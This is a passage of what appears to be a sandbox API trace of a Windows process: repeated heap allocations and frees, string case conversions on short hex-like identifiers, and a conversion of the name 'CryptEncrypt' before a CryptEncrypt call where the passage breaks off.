hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0211.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0211.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0211.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0211.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0211.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0211.273] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0211.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0211.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73b78 [0211.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0211.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0211.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0211.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0211.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0211.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0211.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0211.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0211.273] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0211.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0211.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0211.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0211.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0211.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0211.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0211.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0211.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0211.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0211.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0211.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0211.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0211.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0211.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0211.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0211.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73b78 | out: hHeap=0x2af0000) returned 1 [0211.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0211.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0211.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0211.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0211.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0211.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0211.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0211.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0211.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0211.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0211.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0211.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0211.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0211.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0211.275] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0211.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0211.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74820 [0211.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0211.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0211.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0211.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0211.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0211.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0211.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0211.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0211.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0211.276] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0211.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0211.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0211.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0211.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0211.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0211.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0211.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0211.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0211.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0211.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0211.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0211.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0211.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0211.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0211.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0211.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0211.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0211.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0211.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0211.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74820 | out: hHeap=0x2af0000) returned 1 [0211.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0211.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0211.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0211.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0211.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0211.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0211.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0211.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0211.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0211.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0211.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0211.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0211.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0211.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0211.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0211.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0211.279] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0211.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0211.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0b0 [0211.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0211.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0211.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0211.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0211.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0211.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0211.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0211.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0211.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0211.279] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0211.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0211.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0211.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0211.282] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0211.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0211.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0211.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab230, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.283] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, 